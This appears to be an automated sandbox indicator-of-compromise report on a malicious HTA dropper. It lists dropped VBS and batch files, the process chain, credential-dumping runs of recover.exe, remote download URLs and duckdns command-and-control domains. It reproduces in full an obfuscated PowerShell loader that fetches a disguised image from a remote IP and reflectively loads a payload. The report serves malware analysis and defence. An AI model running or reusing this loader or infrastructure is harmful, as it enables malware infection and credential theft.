IOC Report
creatingbestthingsforhisbeststepstotakehim.hta

creatingbestthingsforhisbeststepstotakehim.hta

HTML document, ASCII text, with CRLF line terminators

initial sample

C:\Users\user\AppData\Roaming\jasgbtisot.dat

data

dropped

C:\Windows\Temp\Sheena.vbs

ASCII text, with CRLF line terminators

dropped

C:\Windows\Temp\anonymiser.bat

DOS batch file, ASCII text, with CRLF line terminators

dropped

C:\Windows\SysWOW64\mshta.exe

mshta.exe "C:\Users\user\Desktop\creatingbestthingsforhisbeststepstotakehim.hta"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Windows\Temp\anonymiser.bat"

C:\Windows\SysWOW64\wscript.exe

wscript //nologo "C:\Windows\Temp\Sheena.vbs"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#HU#cgBl#HQ#aQBl#HM#I##9#C##JwB0#Hg#d##u#G0#aQBo#GU#awBh#HQ#bwB0#HM#c#Bl#HQ#cwB0#HM#ZQBi#HM#aQBo#HI#bwBm#HM#ZwBu#Gk#a#B0#HQ#cwBl#GI#ZwBu#Gk#d#Bh#GU#cgBj#C8#YQBz#Gk#dg#v#H##c#Bt#GE#e##v#DI#Mw#u#DM#Mg#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#C##PQ#g#CQ#cwB1#HI#ZQB0#Gk#ZQBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bt#G8#bwBy#Gw#YQBu#GQ#cw#g#D0#I##n#Gg#d#B0#H##Og#v#C8#Mg#x#Dc#Lg#x#DU#N##u#DU#NQ#u#DE#O##1#C8#e#Bh#G0#c#Bw#C8#Yw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#ZwBv#Gw#Z#Bj#HU#c##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bl#G4#YwBy#Gk#bQBz#G8#bg#g#D0#I##k#Gc#bwBs#GQ#YwB1#H##LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBv#G8#cgBs#GE#bgBk#HM#KQ#7#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GU#bgBj#HI#aQBt#HM#bwBu#Ck#Ow#k#EQ#YQBj#Gk#YQBu#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#Gc#bwBu#G8#YwBh#Gw#eQBj#GU#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##9#C##J#B1#G4#c#By#G8#dgBv#Gs#ZQBk#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#R#Bh#GM#aQBh#G4#cw#p#Ds#J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#D0#I##k#HU#bgBw#HI#bwB2#G8#awBl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bn#G8#bgBv#GM#YQBs#Hk#YwBl#HM#KQ#7#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bwBy#HQ#a#Bv#GQ#bwB4#G4#ZQBz#HM#I##t#Gc#d##g#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##r#D0#I##k#EQ#YQBj#Gk#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#I##9#C##J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#C0#I##k#GE#bgB0#Gk#YwBo#HI#ZQB0#Gk#Yw#7#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#C##PQ#g#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#L##g#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#KQ#7#CQ#cgBl#HM#YQB6#HU#cgBp#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#Ck#Ow#k#GQ#ZQBj#GU#bgB0#HI#YQB0#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#By#GU#cwBh#Ho#dQBy#Gk#bg#p#Ds#J#B2#GU#cwB0#GU#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBD#GE#cwBQ#G8#b##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\SysWOW64\recover.exe

C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\kpsctizepnmfbmfnkvavzvmxchsqhsjyz"

C:\Windows\SysWOW64\recover.exe

C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\vjynt"

C:\Windows\SysWOW64\recover.exe

C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\xllfutvz"

http://217.154.55.185/xampp/c/new_image.jpg

217.154.55.185

http://172.245.123.32/xampp/visa/creatingbestthingsforhisbeststepstotakehim.txt

172.245.123.32

hftook7lmaroutsg5.duckdns.org

hftook7lmaroutsg4.duckdns.org

hftook7lmaroutsg3.duckdns.org

hftook7lmaroutsg2.duckdns.org

hftook7lmaroutsg1.duckdns.org